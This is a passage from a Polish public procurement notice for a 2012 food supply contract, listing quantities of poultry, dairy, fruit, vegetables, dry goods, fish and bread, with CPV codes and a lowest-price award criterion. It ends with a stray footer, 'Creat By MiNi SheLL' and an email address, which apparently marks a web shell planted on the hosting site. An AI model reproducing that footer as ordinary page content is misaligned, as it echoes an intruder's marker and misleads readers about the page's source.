29. żołądki 6 kg
30. piersi z kością  26 kg
31. porcje rosołowe 12 kg
32. skrzydełka 33 kg
33. filet z kurczaka 20 kg
34. wątróbka drobiowa 10 kg
35. pałeczki z kurczaka	40 kg
36. serduszka drobiowe	10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mleko i przetwory mleczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa produktu ilość jednostka
1. ser biały - półtłusty 60 kg
2. mleko w folii 2% 93 litry
3. śmietana 30% (0,5l) 111 szt.
4. masło śmietankowe - 200g	80 szt.
5. masło roślinne w kubku - 250g 23	 szt.
6. serek Danio lub równoważny - 150g 192 szt.
7. serek Twój smak lub równoważny - 200g 15 szt.
8. ser żółty Gouda lub równoważny 4 kg
9. jogurt (mały)- 120g	250 szt.
10. jogurt naturalny 390g 18 szt.
11. jogurt smakowy 150g 240	szt.
12. masło ostrołęckie lub równoważne - 200g 43 szt.
13. Lody w kubku Ice Mastry 300ml	50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Owoce i przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu Ilość jednostka
1. jabłka 103 kg
2. cytryny 14 kg
3. banany 40 kg
4. dżem brzoskwiniowy 280g z Łowicza lub równoważny 8 szt.
5. dżem truskawkowy 380g z Łowicza lub równoważny 41 szt.
6. dżem wiśniowy  280g Łowicz  lub równoważny 25 szt.
7. powidła śliwkowe 400g 2 szt.
8. kompot wiśniowy 8 litry
9. sok Paola 440 ml lub równoważny	 - 112 szt.
10. kompot truskawkowy 6 litry
11. mandarynki 10 kg
12. truskawki(produkty sezonowe) 8 kg
13. winogron 4 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ziemniaki	672 kg
2. ziemniaki młode	 43 kg
3. marchew 71 kg
4. pietruszka 19 kg
5. por	 20 kg
6. pieczarki	8 kg
7. pomidory	13 kg
8. ogórki świeże 25 kg
9. groch 6 kg
10. koper 43 pęczki
11. natka pietruszki 23 pęczki
12. cebula 10 kg
13. kapusta pekińska 11 kg
14. kapusta biała 8 kg
15. kapusta młoda w sezonie 13 szt.
16. kapusta kwaszona 37 kg
17. seler 17	kg
18. Fasola szparagowa 2 kg
19. Fasola  5 kg
20. kalafior świeży 4 kg
21. kalafior mrożony 450 g 8 szt.
22. fasola mrożona 450g 3 szt.
23. sałata 13 szt.
24. koncentrat pomidorowy 30% 190g 40 szt.
25. rzodkiewka 7	pęczki
26. chrzan biały w słoiku 200g	 2 szt.
27. kapusta czerwona 3	 kg
28. ogórki kwaszone 13	kg
29. kapusta włoska 10 szt.
30. przecier szczawiowy siekany w słoiku 200 g	12 szt.
31. ogórki konserwowe 900 ml	 31 słoiki
32. buraki ćwikłowe 35 kg
33. kukurydza w puszcze 400 g 10 szt.
34. brokuły świeże 3 kg
35. szczypiorek 10 pęczki
36. groszek zielony w puszce - 400g 10 szt.
37. włoszczyzna 63 pęczki
38. papryka surowa 3 kg.
39. czosnek  2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przyprawy, makarony, mąki i kasze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa ilość jednostka
1. mąka szymanowska lub równoważna typ 480 15 kg
2. mąka pszenna typ 500 9 kg
3. makaron świderki - 400g 30 szt.
4. kasza manna  Kupiec lub równoważna 3 kg
5. ryż Kupiec lub równoważny	14 kg
6.ryż w saszetkach 400 g 4 szt.
7. kasza jęczmienna Kupiec lub równoważna 10 kg
8. kasza jęczmienna w saszetkach 400g 19 szt.
9. cukier 110 kg
10. sól 18 kg
11. kwasek cytrynowy 50g 15	 szt.
12. liść laurowy 7 g 9 szt.
13. ketchup 900 g 5 szt.
14. ketchup łagodny w tubce Włocławek lub równoważny 1 szt.
15. mąka ziemniaczana	3 kg
16. makaron rosołowy 250 g Vela lub równoważny 67 szt.
17. Przyprawa Vegeta lub równoważna - 200g 75 szt.
18. barszcz biały 65 g 51 szt.
19. majeranek 20g 13 szt.
20. papryka słodka mielona 20g 4 szt.
21. pieprz mielony 20g  12 szt.
22. ziele angielskie 20g 3 szt.
23. kostki rosołowe drobiowe 60 g 30 szt.
24. bulion w butelce 200g 5 szt.
25. płatki czekoladowe 500g Nestle (kulki) lub równoważne 5 szt.
26. płatki kukurydziane 500g Cornflkes lub równoważne 5 szt.
27. jajka duże 618 szt.
28. smalec 200 g	25 szt.
29. herbata granulowana 90g	11 szt.
30. olej uniwersalny 1 litrowy Kujawski lub równoważny 45 szt.
31. majonez  620 g pomorski Ocetix lub równoważny 14 szt.
32. ocet 0,5 l 10% 3 szt.
33. batony - 43g	52 szt.
34. cukier waniliowy 16 g Delekta lub równoważny 14	szt.
35. planta (tłuszcz do smażenia) 200g lub równoważny 8 szt.
36. sos sałatkowy 9g Knorr lub równoważny 11 szt.
37. sos buraczany 200g	 1 szt.
38. żurek 0,5 l 2 szt.
39. cynamon 15g	1 szt.
40. pieprz w ziarnach 20g 2 szt.
41. pieprz mielony 20g 1 szt.
42. sos pieczarkowy 34g 12 szt.
43. sos grzybowy 40g 14 szt.
44. budyń 64g 20	szt.
45.kisiel Delecta 58 g 30 szt.
46.galaretka Delecta 75 g lub równoważna 20 szt.
47. przyprawa do kurczaka 35g 5 szt.
48. herbata ekspresowa (100 torebek) Saga lub równoważna  6 szt.
49. krem czekoladowy NUTELLA 180g lub równoważny 10 szt.
50. kakao granulowane Puchatek lub równoważne - 350g 4 szt.
51. kawa zbożowa INKA 150 g lub równoważna 	4 szt.
52. sos słodko-kwaśny (mały) 350g	60 szt.
53. zupa fasolowa 66 g	20 szt.
54. zupa grochowa 55 g 20 szt.
55. zupa pieczarkowa 45 g 20	 szt.
56. Batony Grześki w polewie lub równoważne - 28g 280 szt.
57. Batony Grześki bez polewy lub równoważne - 28g	160 szt.
58. Batony 50 g Góralki lub równoważne 120 szt. 
59. soczek ze słomką -200 ml	120 szt.
60. musztarda mała 210 g 3 szt.
61. Musztarda 280g sarepska w tubce Kamis lub równoważna 1 szt.
62. Miód naturalny wielokwiatowy 350g Podravka lub równoważny	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu ilość jednostka
1. ryba panga 19 kg
2. ryba mrożona dorsz  10 kg
3. ryba mrożona miruna  13 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa produktu ilość  jednostka
1. pączki 94 szt.
2. bułka słodka z kruszonką 25 szt.
3. bułka słodka z dżemem 25 szt.
4. bułka słodka z budyniem 25	 szt.
5. chleb krojony 2	 szt.
6. chleb razowy 10 szt.
7. chleb pełnoziarnisty (krojony) 20	szt.
8. chleb cały 0,60kg 85	szt.
9. bułki grahamki	33 szt.
10. bułki poznańskie 38 szt.
11. bułki kajzerki 370 szt.
12. bułka tarta 42	 szt.
13. precelki	19 szt.
14. ciasto drożdżowe  2 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com